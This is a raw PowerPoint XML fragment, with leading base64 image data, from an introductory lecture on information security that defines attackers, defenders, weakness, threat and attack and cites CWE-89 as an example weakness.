Dz3T6Svc57p9JVB8c8B4af/AKG+0Xvx0wHhZ/8Aob7RTUcLytE6KvxuvxIe6fSV9B57p9JWvfHXAeFn/wChvtF78dsB4Wf/AKG+0TUcNytE6Kvxu3biuA7FMa7abT7DtRpG46g+ULZMTPA5jZYBA5uZwzZGFl5DzqrQWCV+W4L4QcFE8SMmmDxdE4dh3gg6GTuFT3fC1ASHHEzWLr/Fi0sEd/3CvGx9aWrVhNTm2y+b0sJSmpyRhPLvn8m8tp00LHDDuHKamBgDSDHLsu1NkFoNeUKGzhMTEAYVsGTEQNzAUZAXyAvj2G3Ecgp3Sc2gABdQ8BceW4/FRQQzyOnGd7M2Hia0ZY3WSc/e2twlweIc+ITTWwSNcBkiFlgc/e11jRpX5YTRh4c5/wAu8ZfP9P4cw8YfleI++l/scq9WHGH5XiPvpf5uVeuTsIiICIiAiIgIiICIiAiIgIiICIiAiIgIiICIiAiIgIiICIiAiIgIiICIiAiIg3n4FnEcLwkNLjkn0BaP+F/dIC/fcPhOTe0ZZafK+QmWYS7ToZbDdolo+iNB5F+B/Ao8DhiEkgDJPqTQ7S9dDz4hjnxBr2k53aBwJ7TMsTeawcncYfleI++l/m5V6sOMPyvEffS/zcq9bQREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERBvnwINB4ZgBFjLNv+5eumHRgAkNANHoHcXNHwH/ADzB9mf+l66afuP1H9lmZXHHGH5XiPvpf5uVerDjD8rxH30v83KvWkEREBERAUuSOHayyyEBzQy4mDM3/Yu7IcpHQ0XfdCiKxdiM4e5uFjDXPYba2Wmb6Y05jQd3DZNaFBhfHDrUshGcAXEwXHrbz2Q0/dsbvpBOTh8JJXKV2pnau/7Zz/obvpqRK91u/wARjezA1kl2TR7Dq7Rp73nab0zuv5Izt91kl53gOdzfo87yoI7Y4dLkkAzkGomGo9KeOyav37G76S9jjg2c0sgBcQ6omGm9Dm9kGZx6WmgO6Vnje6x/iMPZiayS6u07Bo7mjvedrvUXET23JyTGkOcS4BwdrWybNUK00v60EZERBL4O4NlncWxMzEVerQNpwaBZIFlzgAN5JW6s444RuUdRutjQNWtFkCMcmdvSO49woHW2nMVqfAXDkuEc50RAL2hpvMCKcHAgtIINjuqsc4k2dSdSg36Tjng8pDcHZDabbG0ba4cm6naMFt0GmnNVZxhnGPdnwmGIjiD7Jytcc5kkawDMbysY6mt6GuoClJl4iMaHF2PiblOV2bkxkcQ4jPcmyDkNXqehqwY/PwYHwQ4lkhlLmyZSQ+N0JliohjzViRxp34t0QamxhJDWglxIAAFkk7gB0lbjwLwhHgIzDisLnke7Puje1zLyGyHUS10cgANgOvcQtW4LDjPEGEB5kYGk6gHMKJHTqrzj85xxLc87JjyYGwdIwHyDkyM78pFXlvTMBQQXbOOuDsE4Mup7LtjTyjQYSXPt5twyPoGxqKIUbFcYYcRE7Cw4QnESVGwkc7SAZ3EvO3cTtTdA7xZWjq24ptecZAI3Br84ouBcB3bFi9L6fxCCBjMI+J2R7adTXbwQQ9oc0giwQQQQR3VgV1xucTinl07ZiRGc7HZh2tuzeZ9lvN5x3KlQEREBERARF9xxOdeVpNAuNAmgN5PcA7qDPkh8JJ2u+1M7Z3nbOZ9Pf9FCyHXsknMBHYmds0th7Jozft7zQ2QpGd3ije01zJebfb+dzvpc3yI57qP+K0dhaLyS6DTs3O5x77m67kEeRkO1lkkJytLbiYLcazB3ZDlA1pwu6GgvRKyHbyySGg3JcTW5iazZ6kOStarNf0VIne6n3hGt2IwSGSjIAW08W7Qu6SdDegCYl7uy3hWssR3TJRyVVRbbtnP05ru9KQR5mQ7eWSQ1l5PNExua+dnqQ5K6KzX5FixLWB5EbnOZey57QxxHlaHOA9JUrGYjWRrsMyNzsmmWQGPKNzAXaZrs3fkpQEBERBvvwH/PMH2Z/wCl66afuP1H9lzL8B/zzB9mf+l66afuP1H9lmYcccYfleI++l/m5V6sOMPyvEffS/zcq9aBERAREQFmhmcNgSFrSWk7RDbG5xruXvWFfTCLF7umtDXkKCylY+3XjGu7MATykhzOo9m3agd9v13Jkffytvb6vlJOf4fdzfp7/Io75IdajlA5QEXIw9j1tp2NX7trd9FOUh8HJXKX2xnau95nP+nu+igkRsfYrGNHZyAeUkFO07Pu0ae+36blXS842cxs66m9d99KyyujynK14fnJBc9pGStGkBoJdd266PcCjoCIs2Gwr5Dljjc91XTGuca7tDo1CD4iic401pcd9AE6fgv0GHA8F024Hu7GJDTnjO2mXkuQUQbvNXONA0FS8U8RiMI97xgpZC9rcvY36ZHteHVl2hYHpC2CPjbiAG1wbJYbmb2Nx2wGDMdnabsNruU3XRBonVGIrnzVydb5K5P/APH/AIWPECZ+snKOLWjV2c0zWt+5u/yLfX8bcTlIbwdINnM0mNxpxDgXO2dpu0K3VlCYrjZiXCQDg6RuYFwuNxyF3L2XbIzDsxo6HZ8qD8+wYbyjOU7Xmbnq+bYvdrutXfHF0Uk+bDh7mNY0PeXulBcXv1Di5xDcpaACQdDoFVu4HxGv+NLoLPY5NB3Tp5Ctn4s8K4jBxOjGAke7PntzH6BwaCKy6EhhAd5Tog1B2FeLuNwqr2XaXuvuXan8BYcNxMZxDXMha9ud223L0i3DVvRrvW6t43YlpBHBsmw9mW2OGzcJLXbOjiY+cO/3d2Fwnw9iZcPJhxgJG2BGHck7RpEIykZdHXENRvsaaINX4zyxOxL3Q5uTpmr35ySGNDjmzOu3AneVWOjIAJBo7jWhrud1XHBOExEE8c/Ukj+TkY4tdE+jRBym2miR5OkFWmNmkfhjhhwdLo97mPczVhe+M00NjaBsxkECgc11og1FFKn4NmY3O+GRrbrM5jwLuqsjuqKgIiICk4EO28soj2H3bnNzitWCt5duo6FRlLD4e8k7WQeyM7ZrThsczds79+0gkZH+Nt7RfbJObfaN3O+ju8qOY+j/AJbT2FprlJNW7NQ7tSNNncK3qPnh7yTtddsZ23vuZzPo7/pIXw67EnMAHZGds0tx2OZvpu/dtFBInY+pLxbXbEdgSSHOLbTBY2izSwdBWiYlj+y3i2voRZqkkPK3VBtjaydN7q0UeR8NOyskByty3Iw07TMXbAzNOtAURpqVEQfc0znuLnuLnHe5xJJ6NSV8IiAiIg334D/nmD7M/wDS9dNP3H6j+y5l+A/55g+xP/S9dNP3H6j+yzMrjjjD8rxH30v83KvVhxh+V4j76X+blXrSCIiAiIgIiILDCMm5MFjAY+WYASyNx5SjlbZFkEXs809IUjk8Tfam31TXaoO395zd30OZ5FVRNBcA45WkgE1dC9TXSpfU0XjGnK5O1u7X4Xf6m9B8Yud+1E8NBEjnOAZG0h+4jMBYGnNByjoCiL7maA4hrszQSA6qsXoa6L7i+EBEU7gnCGV5aIZJdLyxENI1AsktdpZA3byEEri3wWydzw/OS0NIjjLA9+aRjDlLtNlri430N1IFkVMgokD/ANf+tFfM4Gccv+BijYvnt15tV2HTnjTpzD8TOBnGv8DFGxej2683d2H6Q037QQfPGjgdmH5LJn22hxzm9THE4gbDRoXkGidw3GwMnFXgKLEsldLNybmOYGjTbzRYh5A0NHsI36bxvIUTCYVkodyWFxD8ot2WVhq731F5Dpv0Kku4GIv/AAMUKF6vbpzt/YfonTfsn8Aoo6sZry2Lqga6a8qsuM2AZBiXQx58rQ285aTbmh3QBpTh0KVNwQWhxOBxQDWkkmRulZrJ7FrWR1joyu/CPDhWPY6RmExDo273CVhDaFmzyXc18g1QfeF4IY7BSYouOdmcVplsSYRrQenVs8p8vJ+QqHwJhBNiYYXXlkkYwltWA5wBIsEaA3+CGXD+Bl6P+aP8f+JSWYVjozM3C4gxA6vErC0VluzyX0hr0Zh+IYuMGAZDMY43FzMkTwSQe2RteaNCxbt5APkCzy8GRDAtxQc/lXSclloZbbmJO7dkMda783cX1huDhI3PHgsS9hNAtkaRoQDui7pq9wsLL1mPiGK31z27qvwO76W5Br6K44Q4NLIy44SeOnVnkcC0akVXJt70i7qwVToCIiDNhcK+QlrGlzgHOIHcaLJ/ABWDY8RpUTfk7iOxQ9pt1v3b+dt87TfoFAwkbHEh8mQU4g5S6yBo2h3TpfQsow8WnZ/+MvPY3aSC6i39NDa3aoJfJ4jwTfk99qh7TfP3b7/35/lR0eIo3E2up2k9ih0h2cr92hOm3zjep1UXqeLw/wDxZ+1u7Z4Lf625QkGbE4gvOZ2WwA3ZaxgpooaNAF6b956VhREBERAREQb78B/zzB9mf+l66afuP1H9lzL8B/zzB9mf+l66afuP1H9lmZXHHGH5XiPvpf5uVerDjD8rxH30v83KvWkEREBERARFkgiL3BjRbiaA0QfWCjLpGNDM5c5oDCaDiSBluxV7rtWvCPBMjI5HOwjYw2XV4kzZA4CogMxzDbac1E+VRZOBZmjM6OmjUnMzd+BU7G8HRO5dsGVzxiiyICTNcQEptt1mbst2/q7qCgRTsTwRMxpe9lNFWbad5roPlUFAVrxe4bfhJHSMaCXNyG+inskBHlzRjeO6qpEH6RxW4xYvFPLGuY0sZGC45RtZoYxIL0B2ATd6XQugqp3H/EtOWm20FoLa0cKBe2x05dxvyUoPEgwiSQzzOibkbzZDHmHKMzDnMs5boF2/WnVS12WrOXm2avfXRaDb+IAnLMQIHsZYYMz6sOyT5SCdAMue9Cd1BfM3wg4h2fRrc2oqtlx5Wy2xuPLO0Oug1UXig6AR4jl5nMFNGVkhYXtyy3QzNDyCGAA3zjslXOI4M4KHKdlvLdZXtNtPVGVzOyav2Yr+vtYvQK3G8fZ5GysLQBI1zdK2Q/PmAsbjyh8vlULi/wALyiM4CLKOqH8nnO8ctljIOh0IA3C96+eN2GwscrW4R2ZtOzEODm9sdlo5nf6Zb1Hdpt0qON5aQ5pIcCCCDRBG4g9CC7xvFt7MXDhOUaXTGLK7oHKuyjMBda60CdK+pTOE8bLhIDwfmaWSNEmZuXNllEbix9ZhY5Mbj+JXzgHwOwsmJmnecaHOyO5Q8qC0QmIi3A1mL7NE6f61a1yeZz3Fz3Fzjvc4kk0K1J8iDYOB+OEuHhbAxrSwE3f+zSbyu6d9kEEdF3S2Y8YMX1F1aXRlhJthoOfG58kQaaA1BLiKAFAXZ0P5qtneYOtjQZnGe7EfKEhruVddx5qA5OjYbvdzuhBi4a43z4mIwvqi6yRVuAfI9oOnQZDqK0A0WuoiAiLPg8I+VxbG3M4C6sDSwOn60ErgPBulkLGQCY5XHKX5K6A67G4kGrWbF4YxNjfJhWhskTgw8o45nb+VoO0ID27O7TdvX3gOCC2QdUtDYi2TVz2tGYRPc0WL/wBmj693SsLuDeUZDyDQ55iLpaeLDuWmaLBrKcjWadyj0oKtFLxnB0kQBkZlB3atO76ioiAiIgIiICIiDffgP+eYPsT/ANL100/cfqP7LmX4D/nmD7M/9L100/cfqP7LMyuOOMPyvEffS/zcq9WHGH5XiPvpf5uVetIIin9Xx+KQ/mxXtUEBFP6vj8Th/Nivap1fH4nD+bFe1QQFbYBx6jxIDSWl2HtwLKbRkqwdo35O5r0LB1fH4nD+bFe1Xo4UoOY2CNsbywuYOVIPJlxG0XFw52tEbggr0U/q+PxSH82K9qnV8ficP5sV7VB5wGSMTAQC48rHQGUEnO3QF2gP16LFwiTy0lijnfYNWNo6GtPQs7OEg0tezDRMe1zXBwM5otcDuc8gjStQvOuDTZdhonOJJLiZwSSSdzZABv6AggIp/V8ficP5sV7VYsTimuFNgjjN3bDMT9W09w/8INi+DyWRssvJQcq8tZXNpp5WMiwXssE6UHfgRYWrz3mNijZsDcNdymcD8MS4YuMTqLwGnVwOjg4U5pBBsdBUBzr1O9Bt3EKaVrcRyMHKuOTU5S0U2bZc0vYSHAk6E8zVpVe7ibjRd4fdd7cR3Z7A2tT2J+m/RQOC+GZYGyNidlEgAdRcDoHAEOaQRo93TWuoKsZuOWKdnuU7dXTpBR7JtNp2zfKuto2Te7RBjn4oYxjXOdh6a1rnOOeI6MzlxFO1rk3bu55QvjgDg6XM3GNh5SGB4kftMFiKpHCibOz5DvWXFcb8TI2RrpDUgp1OkG/NeXa0Bzm283yKDhOGZY4X4drqikskAuadQAdWkWCALBsabkFljuMTZMdBiiy44XQnLlyue2N+Y5rc+3HUXfc0G5OGoZsWHY1kQ5BjGsLxTSeSDGlzmuke4m3ts2d/o1xWMXDUrcOcKHVCSXEAuHOy2DRAcNgaEHyUgrluBml60Bog7F/tIcp/53EObtgtObYNsN5d43LT1Yu4ZlOHGFzdhBsAFw/2LqcAacMzidQSLQVyLLh5A12Ysa8d67OAfykH/wAqV1fH4pD+bFe1QQFbcIOPUmFBaQ0OnpxLKdbmXQG0K+l+CwdXx+Jw/mxXtV6eFLDWOhjdGzOWsPKgDlC0nUODjzdLJ3lBXop/V8ficP5sV7VOr4/E4fzYr2qDPxdcQZ8rS7/HnBosFDJqTm6B5Ne4qlWDeFMt8nBHGXMfG7Lyrra8Uee51HuELzq+PxSH82K9qggIp/V8ficP5sV7VOr4/E4fzYr2qCAin9Xx+Jw/mxXtVGxMwcbbG2MVVMLyPr23OP8A5QYUREG+/Af88wfZn/peumn7j9R/Zcy/Af8APMH2J/6Xrpp+4/Uf2WZlcccYfleI++l/m5V6sOMPyvEffS/zcq9aQREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBFn6jk5Ll8juRz8nnrZz1myk9BrWumj3CsCDffgP+eYPsz/ANL100/cfqP7LmX4D/nmD7M/9L100/cfqP7LMyuOOMPyvEffS/zcq9bLw5wPeJndym+WQ83uvd5VB6y+c9X3rS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Nq+D/jLEzCT8FSQxvdi3PLXTmoWuEXYw6iCCZGgZgRl0N9z8+Vv1l856vvTrL5z1feg2b4D/nmD7E/9L10tNM0UCdXW0eU5XO/ZpXPHwQcG8nwrC/PezMKqt8L/Kv3CHAiNzakkdmle/ssj5MtwyjKzMdlovQBYm81g//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it-IT" altLang="it-IT" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="204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412875"/>
            <a:ext cx="6353175" cy="311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5" name="CasellaDiTesto 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="460375" y="5084763"/>
            <a:ext cx="82883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Requirements:</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t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nerdy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>in the computer science sense</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nothing you can make a girl/boy fall in love with</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as unknown as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx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smtClean="0"/>
              <a:t>DICTIONARY - I</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1495425"/>
            <a:ext cx="8229600" cy="4454525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Who</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>playfield</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Computers</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Humans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>stupid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>stupid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>ones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>players</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>black</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>white</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t> hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Defenders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>sysadmins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>programmers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0" smtClean="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6197599" y="1432773"/>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6659" y="1362081"/>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29" y="1495425"/>
            <a:ext cx="2157553" cy="21575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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>DICTIONARY - II</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>consider 3 aspects of information security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>security attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>security mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>security service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>note terms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>weakness – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>a general conduct which may lead to generation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>threats </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>threat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>potential for violation of security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0" smtClean="0"/>
              <a:t>assault on system security, a deliberate attempt to evade security services</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" altLang="it-IT" sz="20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smtClean="0"/>
              <a:t>WEAKNESS - EXAMPLE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07302763"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="323840" y="1791146"/>
          <a:ext cx="8686800" cy="854075"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4343400"/>
                <a:gridCol w="4343400"/>
              </a:tblGrid>
              <a:tr h="854075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000066"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CWE-89</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1800" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="15240" marR="15240" marT="15251" marB="15251" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Verdana"/>
